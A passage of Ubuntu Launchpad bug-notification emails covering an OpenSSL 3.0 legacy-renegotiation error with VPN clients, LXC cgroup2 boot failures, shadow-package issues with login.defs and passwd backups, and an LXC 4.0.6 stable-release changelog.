"/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 493, in _ssl_wrap_socket_impl return ssl_context.wrap_socket(sock, server_hostname=server_hostname) File "/usr/lib/python3.10/ssl.py", line 512, in wrap_socket return self.sslsocket_class._create( File "/usr/lib/python3.10/ssl.py", line 1070, in _create self.do_handshake() File "/usr/lib/python3.10/ssl.py", line 1341, in do_handshake self._sslobj.do_handshake() ssl.SSLError: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation disabled (_ssl.c:997) During handling of the above exception, another exception occurred: Traceback (most recent call last): File "/usr/lib/python3/dist-packages/requests/adapters.py", line 439, in send resp = conn.urlopen( File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 755, in urlopen retries = retries.increment( File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 574, in increment raise MaxRetryError(_pool, url, error or ResponseError(cause)) urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='server_url', port=443): Max retries exceeded with url: / (Caused by SSLError(SSLError(1, '[SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation disabled (_ssl.c:997)'))) During handling of the above exception, another exception occurred: Traceback (most recent call last): File "", line 1, in File "/usr/lib/python3/dist-packages/requests/api.py", line 76, in get return request('get', url, params=params, **kwargs) File "/usr/lib/python3/dist-packages/requests/api.py", line 61, in request return session.request(method=method, url=url, **kwargs) File "/usr/lib/python3/dist-packages/requests/sessions.py", line 542, in request resp = self.send(prep, **send_kwargs) File "/usr/lib/python3/dist-packages/requests/sessions.py", line 655, in send r = adapter.send(request, **kwargs) File "/usr/lib/python3/dist-packages/requests/adapters.py", line 514, in send raise SSLError(e, request=request) requests.exceptions.SSLError: HTTPSConnectionPool(host='server_url', port=443): Max retries exceeded with url: / (Caused by SSLError(SSLError(1, '[SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation disabled (_ssl.c:997)'))) # # # I believe in OpenSSL 3.0 that SSL_OP_LEGACY_SERVER_CONNECT is now
[Touch-packages] [Bug 1963834] Re: openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED]
I tried also adding the following: [openssl_init] providers = provider_sect ssl_conf = ssl_configuration as I wasn't sure whether the [ssl_configuration] section would otherwise get used for anything, but that didn't seem to make a difference. The end of the file is [ssl_configuration] client = client_tls_config # https://www.mail-archive.com/openssl-users%40openssl.org/msg90598.htm l # https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1963834 [client_tls_config] Options = UnsafeLegacyRenegotiation -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssl in Ubuntu. https://bugs.launchpad.net/bugs/1963834 Title: openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] Status in openssl package in Ubuntu: New Bug description: Description:Ubuntu Jammy Jellyfish (development branch) Release:22.04 openssl: Installé : 3.0.1-0ubuntu1 Candidat : 3.0.1-0ubuntu1 Table de version : *** 3.0.1-0ubuntu1 500 500 http://ca.archive.ubuntu.com/ubuntu jammy/main amd64 Packages 100 /var/lib/dpkg/status Using Ubuntu 22.04, I now get the following error message when attempting to connect to our office VPN using "gp-saml-gui (https://github.com/dlenski/gp-saml-gui)" : # dominique@Doombuntu:~$ .local/bin/gp-saml-gui server_url Looking for SAML auth tags in response to https://server_url/global-protect/prelogin.esp... usage: gp-saml-gui [-h] [--no-verify] [-C COOKIES | -K] [-g | -p] [-c CERT] [--key KEY] [-v | -q] [-x | -P | -S] [-u] [--clientos {Windows,Linux,Mac}] [-f EXTRA] server [openconnect_extra ...] gp-saml-gui: error: SSL error: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation disabled (_ssl.c:997) # # # gp-saml-gui uses python module requests. Using python ide, I can get the same results : # >>> r = requests.get('https://server_url') Traceback (most recent call last): File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 699, in urlopen httplib_response = self._make_request( File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 382, in _make_request self._validate_conn(conn) File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 1012, in _validate_conn conn.connect() File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 411, in connect self.sock = ssl_wrap_socket( File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 449, in ssl_wrap_socket ssl_sock = _ssl_wrap_socket_impl( File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 493, in _ssl_wrap_socket_impl return ssl_context.wrap_socket(sock, server_hostname=server_hostname) File "/usr/lib/python3.10/ssl.py", line 512, in wrap_socket return self.sslsocket_class._create( File "/usr/lib/python3.10/ssl.py", line 1070, in _create self.do_handshake() File "/usr/lib/python3.10/ssl.py", line 1341, in do_handshake self._sslobj.do_handshake() ssl.SSLError: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation disabled (_ssl.c:997) During handling of the above exception, another exception occurred: Traceback (most recent call last): File "/usr/lib/python3/dist-packages/requests/adapters.py", line 439, in send resp = conn.urlopen( File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 755, in urlopen retries = retries.increment( File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 574, in increment raise MaxRetryError(_pool, url, error or ResponseError(cause)) urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='server_url', port=443): Max retries exceeded with url: / (Caused by SSLError(SSLError(1, '[SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation disabled (_ssl.c:997)'))) During handling of the above exception, another exception occurred: Traceback (most recent call last): File "", line 1, in File "/usr/lib/python3/dist-packages/requests/api.py", line 76, in get return request('get', url, params=params, **kwargs) File "/usr/lib/python3/dist-packages/requests/api.py", line 61, in request return session.request(method=method, url=url, **kwargs) File "/usr/lib/python3/dist-packages/requests/sessions.py", line 542, in request resp = self.send(prep, **send_kwargs) File "/usr/lib/python3/dist-packages/requests/sessions.py", line 655, in send r = adapter.send(request, **kwargs) File "/usr/lib/python3/dist-packages/requests/adapters.py", line 514, in send raise SSLError(e, request=request) requests.exceptions.SSLError: HTTPSConnectionPool(host='server_url', port=443): Max retries exceeded with url: / (Caused by SSLError(SSLError(1, '[SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe
[Touch-packages] [Bug 1963834] Re: openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED]
FWIW I'm seeing this with the openconnect-sso (https://github.com/vlaci/openconnect-sso) package on jammy. I just tried adding the following to my /etc/ssl/openssl.cfg: [ssl_configuration] client = client_tls_config [client_tls_config] Options = UnsafeLegacyServerConnect With no luck :( -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssl in Ubuntu. https://bugs.launchpad.net/bugs/1963834 Title: openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] Status in openssl package in Ubuntu: New Bug description: Description:Ubuntu Jammy Jellyfish (development branch) Release:22.04 openssl: Installé : 3.0.1-0ubuntu1 Candidat : 3.0.1-0ubuntu1 Table de version : *** 3.0.1-0ubuntu1 500 500 http://ca.archive.ubuntu.com/ubuntu jammy/main amd64 Packages 100 /var/lib/dpkg/status Using Ubuntu 22.04, I now get the following error message when attempting to connect to our office VPN using "gp-saml-gui (https://github.com/dlenski/gp-saml-gui)" : # dominique@Doombuntu:~$ .local/bin/gp-saml-gui server_url Looking for SAML auth tags in response to https://server_url/global-protect/prelogin.esp... usage: gp-saml-gui [-h] [--no-verify] [-C COOKIES | -K] [-g | -p] [-c CERT] [--key KEY] [-v | -q] [-x | -P | -S] [-u] [--clientos {Windows,Linux,Mac}] [-f EXTRA] server [openconnect_extra ...] gp-saml-gui: error: SSL error: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation disabled (_ssl.c:997) # # # gp-saml-gui uses python module requests. Using python ide, I can get the same results : # >>> r = requests.get('https://server_url') Traceback (most recent call last): File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 699, in urlopen httplib_response = self._make_request( File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 382, in _make_request self._validate_conn(conn) File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 1012, in _validate_conn conn.connect() File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 411, in connect self.sock = ssl_wrap_socket( File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 449, in ssl_wrap_socket ssl_sock = _ssl_wrap_socket_impl( File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 493, in _ssl_wrap_socket_impl return ssl_context.wrap_socket(sock, server_hostname=server_hostname) File "/usr/lib/python3.10/ssl.py", line 512, in wrap_socket return self.sslsocket_class._create( File "/usr/lib/python3.10/ssl.py", line 1070, in _create self.do_handshake() File "/usr/lib/python3.10/ssl.py", line 1341, in do_handshake self._sslobj.do_handshake() ssl.SSLError: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation disabled (_ssl.c:997) During handling of the above exception, another exception occurred: Traceback (most recent call last): File "/usr/lib/python3/dist-packages/requests/adapters.py", line 439, in send resp = conn.urlopen( File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 755, in urlopen retries = retries.increment( File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 574, in increment raise MaxRetryError(_pool, url, error or ResponseError(cause)) urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='server_url', port=443): Max retries exceeded with url: / (Caused by SSLError(SSLError(1, '[SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation disabled (_ssl.c:997)'))) During handling of the above exception, another exception occurred: Traceback (most recent call last): File "", line 1, in File "/usr/lib/python3/dist-packages/requests/api.py", line 76, in get return request('get', url, params=params, **kwargs) File "/usr/lib/python3/dist-packages/requests/api.py", line 61, in request return session.request(method=method, url=url, **kwargs) File "/usr/lib/python3/dist-packages/requests/sessions.py", line 542, in request resp = self.send(prep, **send_kwargs) File "/usr/lib/python3/dist-packages/requests/sessions.py", line 655, in send r = adapter.send(request, **kwargs) File "/usr/lib/python3/dist-packages/requests/adapters.py", line 514, in send raise SSLError(e, request=request) requests.exceptions.SSLError: HTTPSConnectionPool(host='server_url', port=443): Max retries exceeded with url: / (Caused by SSLError(SSLError(1, '[SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation disabled (_ssl.c:997)'))) # # # I believe in OpenSSL 3.0 that SSL_OP_LEGACY_SERVER_CONNECT is now disabled by default, as opposed to the version used in earlier
[Touch-packages] [Bug 1917187] Re: lxc cgroup2: containers unbootable
FWIW this is affecting me on jammy too. I'll have to take a look at systemd sources. Adding: lxc.init.cmd = /sbin/init systemd.unified_cgroup_hierarchy to my config does not help, nor does bind mounting a /proc/filesystems without 'cgroup' (v1) in it. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1917187 Title: lxc cgroup2: containers unbootable Status in lxc package in Ubuntu: Invalid Bug description: Distributor ID: Ubuntu Description: Ubuntu 20.04.2 LTS Release: 20.04 Codename: focal If one sets in /etc/default/grub (as e.g. desired by facebook oomd): GRUB_CMDLINE_LINUX="systemd.unified_cgroup_hierarchy=1 swapaccount=1 ..." lxc is not able to start any containers anymore. # lxc-start -F n04-01 lxc-start: n04-01: conf.c: lxc_setup_boot_id: 3249 Permission denied - Failed to mount /dev/.lxc-boot-id to /proc/sys/kernel/random/boot_id Failed to mount cgroup at /sys/fs/cgroup/systemd: Operation not permitted [!!] Failed to mount API filesystems. Exiting PID 1... config: --- # Common configuration lxc.include = /usr/share/lxc/config/ubuntu.common.conf # Container specific configuration lxc.apparmor.profile = lxc-default-cgns-with-mounting lxc.start.auto = 1 lxc.rootfs.path = dir:/zones/n04-01/rootfs lxc.rootfs.options = noatime lxc.mount.fstab = /zones/n04-01/fstab lxc.uts.name = n04-01 lxc.arch = amd64 # Network configuration lxc.net.0.type = macvlan lxc.net.0.macvlan.mode = bridge lxc.net.0.flags = up lxc.net.0.link = vlan2 lxc.net.0.hwaddr = 00:80:41:22:0d:10 lxc.net.0.name = n04-01_0 #lxc.include = /zones/n04-01/nvconfig lxc.start.order = 16 #lxc.net.0.ipv4 = 10.2.1.65/16 #lxc.net.0.ipv4.gateway = 10.2.0.1 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1917187/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1869267] Re: /etc/login.defs contains a non-ASCII character
This is in the debian/login.defs file, and was replaced at least before bionic with a proper ascii ', so I'm targeting this to xenial. ** Changed in: shadow (Ubuntu) Status: New => Fix Released ** Also affects: shadow (Ubuntu Xenial) Importance: Undecided Status: New ** Changed in: shadow (Ubuntu Xenial) Status: New => Confirmed ** Changed in: shadow (Ubuntu Xenial) Importance: Undecided => Medium -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/1869267 Title: /etc/login.defs contains a non-ASCII character Status in shadow package in Ubuntu: Fix Released Status in shadow source package in Xenial: Confirmed Bug description: 1) OS: Ubuntu 16.04.6 LTS 2) Package: login 1:4.2-3.1ubuntu5.4 amd64 from xenial-updates/main 3) After installing this package, I expect /etc/login.defs to contain only ASCII characters. 4) Instead, /etc/login.defs contains an Acute Accent (Unicode U+00B4) on line 221 in a comment: === Quote From File === # If set to yes, userdel will remove the user´s group if it contains no === End Quote === This causes a problem in SaltStack: https://github.com/saltstack/salt/issues/55695 SaltStack does recognize that they should do a better job at loading this file and is planning on fixing its problem. But I still question this: Should we expect /etc/login.defs to contain ASCII characters only? ProblemType: Bug DistroRelease: Ubuntu 16.04 Package: login 1:4.2-3.1ubuntu5.4 ProcVersionSignature: Ubuntu 4.4.0-1101.112-aws 4.4.208 Uname: Linux 4.4.0-1101-aws x86_64 ApportVersion: 2.20.1-0ubuntu2.21 Architecture: amd64 Date: Thu Mar 26 17:46:26 2020 ProcEnviron: TERM=xterm-256color PATH=(custom, no user) LANG=en_US.UTF-8 SHELL=/bin/bash SourcePackage: shadow UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1869267/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1923262] Re: backup /etc/passwd- file should be mode 0600
I appreciate you bringing this to our attention, but (as shadow upstream maintainer) I'm going to join John in saying this should be wontfix. Now if you want to change the subject to also making /etc/passwd 600, then as Alexander points out that may be doable and have merit. But just hiding the backup file doesn't make sense, and as it would require extra code in the already fiddly backup code in shadow, there is regression concern. ** Changed in: shadow (Ubuntu) Status: Confirmed => Won't Fix -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/1923262 Title: backup /etc/passwd- file should be mode 0600 Status in shadow package in Ubuntu: Won't Fix Bug description: CIS hardening benchmarks (6.1.6) suggest that the /etc/passwd- file should be mode 0600 (or more restrictive). However, this file is 0644 after it is created when the /etc/passwd file is modified. (Ie, a hardening script that creates a hardened system for initial use could change this mode, but it will go out of compliance the next time a backup file is made.) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1923262/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1928309] Re: usermod change home directory no tilde
Well that's just fascinating! :) This would be best reported at https://github.com/shadow- maint/shadow/issues. Would you mind opening an issue there? ** Changed in: shadow (Ubuntu) Status: New => Confirmed ** Changed in: shadow (Ubuntu) Importance: Undecided => Wishlist -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/1928309 Title: usermod change home directory no tilde Status in shadow package in Ubuntu: Confirmed Bug description: I believe usermod is in the passwd package. Running `sudo usermod -d /home/username username` will result in correct terminal output as `username@hostname:~$` But running `sudo usermod -d /home/username/ username` will output `username@/home/username:~$`, since usermod does not drop the trailing forward slash and the string "/home/username/" does not match with "/home/username". This is a result of tab completion causing the extra forward slash. This bug is purely cosmetic. ProblemType: Bug DistroRelease: Ubuntu 20.04 Package: passwd 1:4.8.1-1ubuntu5.20.04 ProcVersionSignature: User Name 5.4.0-1048.50-aws 5.4.106 Uname: Linux 5.4.0-1048-aws x86_64 ApportVersion: 2.20.11-0ubuntu27.17 Architecture: amd64 CasperMD5CheckResult: skip Date: Thu May 13 08:08:56 2021 Ec2AMI: ami-0d382e80be7ffdae5 Ec2AMIManifest: (unknown) Ec2AvailabilityZone: us-west-1b Ec2InstanceType: c5n.4xlarge Ec2Kernel: unavailable Ec2Ramdisk: unavailable ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=C.UTF-8 SHELL=/bin/bash SourcePackage: shadow UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1928309/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1923232] Re: SRU of LXC 4.0.6 to focal (upstream bugfix release)
** Changed in: lxc (Ubuntu Focal) Status: New => In Progress -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1923232 Title: SRU of LXC 4.0.6 to focal (upstream bugfix release) Status in lxc package in Ubuntu: New Status in lxc source package in Focal: In Progress Bug description: LXC released 4.0.6 as a bugfix release with the following changelog: - Improve handling for compatibility architectures for seccomp - Harden seccomp notifier implementation - Rework parsing of /proc//mountinfo to handle kernel regression - Improve network device restoration - Significantly cleanup and harden config file parsing - Support new capabilities CAP_PERFORM, CAP_BPF, and CAP_CHECKPOINT_RESTORE - Harden containers started without CAP_NET_ADMIN * New upstream bugfix release (4.0.5): - Support allocating PTS devices from within the container - Harden more path/mount handling logics - Rework LSM logic to limit initializer use * Cherry-pick upstream fixes: - 0002-commands-fix-check-for-seccomp-notify-support.patch - 0003-configure-skip-libseccomp-tests-if-it-is-disabled.patch - 0004-conf-fix-containers-retaining-CAP_NET_ADMIN.patch - 0005-cgroups-fix-cgroup-mounting.patch - 0006-lsm-remove-obsolute-comment-about-constructor.patch - 0007-lxc_attach-include-rexec-conditionally.patch - 0008-tree-wide-fix-some-header-inclusions.patch - 0009-initutils-fix-missing-includes.patch - 0010-configure-support-static-binaries.patch - 0011-autotools-enable-static-builds-for-tools.patch - 0012-autotools-enable-static-builds-for-commands.patch - 0013-tree-wide-fix-compilation-with-Wstrict-prototypes-Wo.patch - 0014-config-update-ax_pthread.m4.patch - 0015-configure-add-AC_SYS_LARGEFILE-checking.patch - 0016-autotools-update-build.patch - 0017-file_utils-introduce-read_file_at.patch - 0018-string_utils-add-must_make_path_relative.patch - 0019-cgroups-coding-style-fixes.patch - 0020-cgroups-rework-cg_unified_init.patch - 0021-cgroups-detect-and-record-cgroup2-freezer-support.patch - 0022-criu-handle-cgroup2-freezer.patch - 0023-mkdir-p-proc-sys-on-container-startup.patch - 0024-conf-fix-coding-style.patch - 0025-conf-coding-style-fixes.patch - 0026-conf-move-proc-and-sys-mountpoint-creation-int-lxc_m.patch - 0027-attach-invert-child-parent-handling.patch - 0028-attach-use-__do_free-cleanup-macro-for-cwd.patch - 0029-attach-tweak-logging.patch - 0030-attach-use-__do_close-for-labelfd.patch - 0031-attach-coding-style-fixes.patch - 0032-attach-use-free_disarm.patch - 0033-attach-s-attach_child_main-do_attach-g.patch - 0034-attach-mark-do_attach-as-__noreturn.patch - 0035-attach-make-do_attach-void.patch - 0036-attach-use-close_prot_errno_disarm.patch - 0037-attach-add-some-DEBUG-logging-to-stdfd-dpulication.patch - 0038-cgroups-fix-cgroup-mounting.patch - 0039-utils-fix-mount_at.patch - 0040-configure-fix-static-builds-with-clang-12-and-LTO.patch - 0041-cgroups-bpf-fixes.patch - 0042-croups-improve-__do_bpf_program_free.patch - 0043-cgroups-coding-style-fixes.patch - 0044-cgroups-don-t-initiliaze-NULL-log.patch - 0045-cgroups-ensure-all-memory-is-zeroed.patch - 0046-cgroups-use-zalloc.patch - 0047-cgroups-tweak-cgroup-initialization.patch - 0048-log-remove-pointless-inline.patch - 0049-log-add-lxc_log_get_fd.patch - 0050-seccomp-use-lxc_log_get_fd.patch - 0051-log-rework-lxc_log_get_level.patch - 0052-seccomp-use-lxc_log_get_level.patch - 0053-cgroups-use-bpf-log-when-logging-at-trace-level.patch - 0054-log-add-lxc_log_trace-helper.patch - 0055-cgroups-use-PTR_TO_U64.patch - 0056-cgroups-align-methods.patch - 0057-utils-use-SYSTRACE-when-logging-stdio-permission-fix.patch - 0058-attach-log-failues-to-dup2-with-SYSDEBUG.patch - 0059-attach-fix-logging-for-stdfd-replacement.patch - 0060-attach-fix-error-checking-for-dup2.patch - 0061-cgroups-initialize-variable.patch - 0062-commands_utils-don-t-leak-memory.patch - 0063-conf-use-lxc_log_trace.patch - 0064-confile_utils-use-lxc_log_trace.patch - 0065-rexec-check-lseek-return-value.patch * Cherry-pick upstream bugfix: - cgroups: fix armhf builds * Cherry-pick upstream bugfix: - cgfsng: fix cgroup attach cgroup creation * New upstream bugfix release (4.0.4): - Support for new Linux clone flags (clone into cgroup) - Support for new Linux VFS system calls - Internal symbols are now properly hidden from external consumers * New upstream bugfix release (4.0.3): -
[Touch-packages] [Bug 1923232] Re: SRU of LXC 4.0.6 to focal (upstream bugfix release)
** No longer affects: lxc (Ubuntu Bionic) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1923232 Title: SRU of LXC 4.0.6 to focal (upstream bugfix release) Status in lxc package in Ubuntu: New Status in lxc source package in Focal: New Bug description: LXC released 4.0.6 as a bugfix release with the following changelog: - Improve handling for compatibility architectures for seccomp - Harden seccomp notifier implementation - Rework parsing of /proc//mountinfo to handle kernel regression - Improve network device restoration - Significantly cleanup and harden config file parsing - Support new capabilities CAP_PERFORM, CAP_BPF, and CAP_CHECKPOINT_RESTORE - Harden containers started without CAP_NET_ADMIN * New upstream bugfix release (4.0.5): - Support allocating PTS devices from within the container - Harden more path/mount handling logics - Rework LSM logic to limit initializer use * Cherry-pick upstream fixes: - 0002-commands-fix-check-for-seccomp-notify-support.patch - 0003-configure-skip-libseccomp-tests-if-it-is-disabled.patch - 0004-conf-fix-containers-retaining-CAP_NET_ADMIN.patch - 0005-cgroups-fix-cgroup-mounting.patch - 0006-lsm-remove-obsolute-comment-about-constructor.patch - 0007-lxc_attach-include-rexec-conditionally.patch - 0008-tree-wide-fix-some-header-inclusions.patch - 0009-initutils-fix-missing-includes.patch - 0010-configure-support-static-binaries.patch - 0011-autotools-enable-static-builds-for-tools.patch - 0012-autotools-enable-static-builds-for-commands.patch - 0013-tree-wide-fix-compilation-with-Wstrict-prototypes-Wo.patch - 0014-config-update-ax_pthread.m4.patch - 0015-configure-add-AC_SYS_LARGEFILE-checking.patch - 0016-autotools-update-build.patch - 0017-file_utils-introduce-read_file_at.patch - 0018-string_utils-add-must_make_path_relative.patch - 0019-cgroups-coding-style-fixes.patch - 0020-cgroups-rework-cg_unified_init.patch - 0021-cgroups-detect-and-record-cgroup2-freezer-support.patch - 0022-criu-handle-cgroup2-freezer.patch - 0023-mkdir-p-proc-sys-on-container-startup.patch - 0024-conf-fix-coding-style.patch - 0025-conf-coding-style-fixes.patch - 0026-conf-move-proc-and-sys-mountpoint-creation-int-lxc_m.patch - 0027-attach-invert-child-parent-handling.patch - 0028-attach-use-__do_free-cleanup-macro-for-cwd.patch - 0029-attach-tweak-logging.patch - 0030-attach-use-__do_close-for-labelfd.patch - 0031-attach-coding-style-fixes.patch - 0032-attach-use-free_disarm.patch - 0033-attach-s-attach_child_main-do_attach-g.patch - 0034-attach-mark-do_attach-as-__noreturn.patch - 0035-attach-make-do_attach-void.patch - 0036-attach-use-close_prot_errno_disarm.patch - 0037-attach-add-some-DEBUG-logging-to-stdfd-dpulication.patch - 0038-cgroups-fix-cgroup-mounting.patch - 0039-utils-fix-mount_at.patch - 0040-configure-fix-static-builds-with-clang-12-and-LTO.patch - 0041-cgroups-bpf-fixes.patch - 0042-croups-improve-__do_bpf_program_free.patch - 0043-cgroups-coding-style-fixes.patch - 0044-cgroups-don-t-initiliaze-NULL-log.patch - 0045-cgroups-ensure-all-memory-is-zeroed.patch - 0046-cgroups-use-zalloc.patch - 0047-cgroups-tweak-cgroup-initialization.patch - 0048-log-remove-pointless-inline.patch - 0049-log-add-lxc_log_get_fd.patch - 0050-seccomp-use-lxc_log_get_fd.patch - 0051-log-rework-lxc_log_get_level.patch - 0052-seccomp-use-lxc_log_get_level.patch - 0053-cgroups-use-bpf-log-when-logging-at-trace-level.patch - 0054-log-add-lxc_log_trace-helper.patch - 0055-cgroups-use-PTR_TO_U64.patch - 0056-cgroups-align-methods.patch - 0057-utils-use-SYSTRACE-when-logging-stdio-permission-fix.patch - 0058-attach-log-failues-to-dup2-with-SYSDEBUG.patch - 0059-attach-fix-logging-for-stdfd-replacement.patch - 0060-attach-fix-error-checking-for-dup2.patch - 0061-cgroups-initialize-variable.patch - 0062-commands_utils-don-t-leak-memory.patch - 0063-conf-use-lxc_log_trace.patch - 0064-confile_utils-use-lxc_log_trace.patch - 0065-rexec-check-lseek-return-value.patch * Cherry-pick upstream bugfix: - cgroups: fix armhf builds * Cherry-pick upstream bugfix: - cgfsng: fix cgroup attach cgroup creation * New upstream bugfix release (4.0.4): - Support for new Linux clone flags (clone into cgroup) - Support for new Linux VFS system calls - Internal symbols are now properly hidden from external consumers * New upstream bugfix release (4.0.3): - Improvement to cgroupv1/cgroupv2 handling
[Touch-packages] [Bug 1923232] [NEW] SRU of LXC 4.0.6 to focal (upstream bugfix release)
included in this upstream release. [Test case] lxc has autopkgtests which will assert that the binaries built in -proposed are functional. ** Affects: lxc (Ubuntu) Importance: Undecided Status: New ** Affects: lxc (Ubuntu Bionic) Importance: High Assignee: Serge Hallyn (serge-hallyn) Status: New ** Affects: lxc (Ubuntu Focal) Importance: High Assignee: Serge Hallyn (serge-hallyn) Status: New ** Also affects: lxc (Ubuntu Focal) Importance: Undecided Status: New ** Also affects: lxc (Ubuntu Bionic) Importance: Undecided Status: New ** Changed in: lxc (Ubuntu Focal) Assignee: (unassigned) => Serge Hallyn (serge-hallyn) ** Changed in: lxc (Ubuntu Bionic) Assignee: (unassigned) => Serge Hallyn (serge-hallyn) ** Changed in: lxc (Ubuntu Bionic) Importance: Undecided => High ** Changed in: lxc (Ubuntu Focal) Importance: Undecided => High -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1923232 Title: SRU of LXC 4.0.6 to focal (upstream bugfix release) Status in lxc package in Ubuntu: New Status in lxc source package in Bionic: New Status in lxc source package in Focal: New Bug description: LXC released 4.0.6 as a bugfix release with the following changelog: - Improve handling for compatibility architectures for seccomp - Harden seccomp notifier implementation - Rework parsing of /proc//mountinfo to handle kernel regression - Improve network device restoration - Significantly cleanup and harden config file parsing - Support new capabilities CAP_PERFORM, CAP_BPF, and CAP_CHECKPOINT_RESTORE - Harden containers started without CAP_NET_ADMIN * New upstream bugfix release (4.0.5): - Support allocating PTS devices from within the container - Harden more path/mount handling logics - Rework LSM logic to limit initializer use * Cherry-pick upstream fixes: - 0002-commands-fix-check-for-seccomp-notify-support.patch - 0003-configure-skip-libseccomp-tests-if-it-is-disabled.patch - 0004-conf-fix-containers-retaining-CAP_NET_ADMIN.patch - 0005-cgroups-fix-cgroup-mounting.patch - 0006-lsm-remove-obsolute-comment-about-constructor.patch - 0007-lxc_attach-include-rexec-conditionally.patch - 0008-tree-wide-fix-some-header-inclusions.patch - 0009-initutils-fix-missing-includes.patch - 0010-configure-support-static-binaries.patch - 0011-autotools-enable-static-builds-for-tools.patch - 0012-autotools-enable-static-builds-for-commands.patch - 0013-tree-wide-fix-compilation-with-Wstrict-prototypes-Wo.patch - 0014-config-update-ax_pthread.m4.patch - 0015-configure-add-AC_SYS_LARGEFILE-checking.patch - 0016-autotools-update-build.patch - 0017-file_utils-introduce-read_file_at.patch - 0018-string_utils-add-must_make_path_relative.patch - 0019-cgroups-coding-style-fixes.patch - 0020-cgroups-rework-cg_unified_init.patch - 0021-cgroups-detect-and-record-cgroup2-freezer-support.patch - 0022-criu-handle-cgroup2-freezer.patch - 0023-mkdir-p-proc-sys-on-container-startup.patch - 0024-conf-fix-coding-style.patch - 0025-conf-coding-style-fixes.patch - 0026-conf-move-proc-and-sys-mountpoint-creation-int-lxc_m.patch - 0027-attach-invert-child-parent-handling.patch - 0028-attach-use-__do_free-cleanup-macro-for-cwd.patch - 0029-attach-tweak-logging.patch - 0030-attach-use-__do_close-for-labelfd.patch - 0031-attach-coding-style-fixes.patch - 0032-attach-use-free_disarm.patch - 0033-attach-s-attach_child_main-do_attach-g.patch - 0034-attach-mark-do_attach-as-__noreturn.patch - 